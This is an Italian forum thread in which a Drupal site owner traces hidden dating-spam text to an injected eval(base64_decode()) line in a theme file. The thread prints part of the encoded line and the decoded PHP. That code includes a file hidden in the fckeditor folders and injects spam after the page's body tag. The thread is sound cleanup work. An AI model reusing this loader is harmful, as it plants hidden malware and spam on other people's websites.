Qualche giorno fa mi è arrivato da Google il messaggio sotto riportato. In effetti quello che c'è scritto è vero: se si va a vedere il codice della pagina restituita, la riga 22 contiene davvero tutta quella robaccia e altra simile.
Cambiando tema, il testo nascosto rimane (cambia solo il numero di riga).
Successivamente, grazie ai suggerimenti di gente più esperta di me, ho scoperto che all'inizio del file page.tpl.php, alla riga 1, prima delle dichiarazioni, compare una lunghissima ed incomprensibile istruzione php criptata. Ne riporto qui sotto il pezzetto iniziale (in tutto sono circa 1290 caratteri):
<?php/**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTF
Ho provato a scaricare page.tpl.php sul desktop, cancellare la riga 1 e
ricaricarlo. Ma all'apertura del browser evidentemente si rigenera, perché è di nuovo lì.
Preciso anche che la versione in uso è 5.1, che la cache è disattivata e che la modalità input predefinita per tutti gli utenti è full html.
Grazie
TESTO DEL MESSAGGIO DI GOOGLE:
Gentile proprietario o webmaster del sito istitutosantelia.it/dr,
Durante l'indicizzazione delle pagine web del tuo sito abbiamo rilevato che alcune di esse utilizzano tecniche non conformi alle nostre norme sulla qualità, consultabili all'indirizzo http://www.google.com/support/webmasters/bin/answer.py?answer=35769&hl=it.
Ciò sembra essere dovuto al fatto che il tuo sito è stato modificato da
terzi. Generalmente i responsabili di tale infrazione ottengono accesso a directory non protette e senza restrizioni.
Spesso vengono caricati nuovi file o modificati file esistenti che poi
risultano nel nostro indice come spam.
Il seguente è un esempio di testo nascosto trovato nella pagina
http://www.istitutosantelia.it/dr/index.php:
LESBIAN DATING ON LINE lesbian dating on line INTERNET DATING TIPS internet dating tips DATING LINES dating lines DATING PSYCHO dating psycho FREE DATING SITES IN EUROPE free dating sites in europeDATING FRIENDS SISTER dating friends sisterDATING GIRL RUSSIAN dating girl russianRIHANA DATING rihana dating DATING SITES REVIEW
Per preservare la qualità del nostro motore di ricerca, abbiamo pianificato di rimuovere temporaneamente dai nostri risultati di ricerca le pagine del sito istitutosantelia.it/dr per almeno 30 giorni.
Saremmo lieti di mantenere le tue pagine nell'indice di Google. Per
richiedere la riconsiderazione del sito, correggi o rimuovi tutte le pagine non conformi alle nostre norme sulla qualità (gli esempi forniti non sono esaustivi). Una possibile soluzione consiste nel contattare il supporto tecnico del tuo host web per ricevere assistenza (ecc...)
MAH! Page.tpl.php che si rigenera? Che permessi ha?
Direi che se si verifica veramente, dovresti subito chiamare il tuo fornitore hosting e chiedergli di risolvere il problema SUBITO!
Poi, con la versione 5.1 (solo una quindicina di aggiornamenti di sicurezza fa...) e il FullHTML per tutti gli utenti, direi che sei un tantino troppo "aperto".
Hai provato a decodificare base64 il testo che trovi nella riga incriminata? Almeno capisci se è quello il problema.
Io non sono capace di decodificare alcunché, ma un amico che l'ha fatto (solo su quel frammento che ho trascritto qui) dice che c'è scritto
"if(function_exists('ob_start')&&!isset($GLOBAL ecc ecc..."
Comunque nel frattempo ho fatto i seguenti tentativi:
- ho eliminato (dopo backup) tutta la cartella del tema zen
- ho scaricato la nuova versione e l'ho caricata sul server, ma la famosa riga 22 era ancora lì
- dato che il nuovo zen classic non mi piace (è troppo appiccicato ai bordi dello schermo) ho cancellato la riga 1 da page.tpl.php
- ho scoperto che la stessa stringa compariva anche in diversi file php del tema zen, perciò l'ho cancellata dappertutto
- ho ricaricato sul server la cartella zen
- ora la stringa non ricompare più, ma la riga 22 sì
- ho disattivato a gruppi tutti i moduli, andando a vedere ogni volta sulla homepage (perché solo lì c'è il guaio) ma non è mai cambiato nulla.
Beh, se cerchi decode base64 su Google qualcosa riesci a fare e se scrivi qua il risultato della decodifica si capisce meglio.
Hai controllato a che altezza del documento avviene l'insert? Che cosa c'è a quel punto nel page.tpl.php (o node.tpl.php)?
Poi.. hai provato a fare un'installazione in locale o su un altro server del sito per vedere se cambia qualcosa?
Questa è la stringa decodificata:
if(function_exists('ob_start')&&!isset($GLOBALS['sh_no'])){$GLOBALS['sh_no']=1;if(file_exists('/web/htdocs/www.istitutosantelia.it/home/dr/modules/fckeditor/fckeditor/editor/filem...)){include_once('/web/htdocs/www.istitutosantelia.it/home/dr/modules/fckeditor/fckeditor/editor/filem...);if(function_exists('gml')&&!function_exists('dgobh')){if(!function_exists('gzdecode')){function gzdecode($d){$f=ord(substr($d,3,1));$h=10;$e=0;if($f&4){$e=unpack('v',substr($d,10,2));$e=$e[1];$h+=2+$e;}if($f&8){$h=strpos($d,chr(0),$h)+1;}if($f&16){$h=strpos($d,chr(0),$h)+1;}if($f&2){$h+=2;}$u=gzinflate(substr($d,$h));if($u===FALSE){$u=$d;}return $u;}}function dgobh($b){Header('Content-Encoding: none');$c=gzdecode($b);if(preg_match('/\<body/si',$c)){return preg_replace('/(\<body[^\>]*\>)/si','$1'.gml(),$c);}else{return gml().$c;}}ob_start('dgobh');}}}Comunque sono riuscito a cancellarla da tutti i file del tema zen, ma la riga di disturbo nascosta appare tuttora nel codice della pagina, all'apertura del body:
<body class="front logged-in sidebar-left"><div style="display:none"><!--773550740--><h2>TERRENCE AND ROCSI DATING... (ecc.).EUREKA!
Grazie alla decodifica che mi hai detto di fare, ho visto che si faceva riferimento ad un file in
modules/fckeditor/fckeditor/editor/filemanager/browser/default/images/icons/32/
ho confrontato il tutto con il backup e ho visto che la cartella 32, che
conteneva molti file non-immagine, prima non c'era.
Allora ho cancellato la cartella 32 et voilà... scomparso il codice
cattivo!
Grazie, Pinolo!
Resterebbe da capire come è finita lì la cartella 32...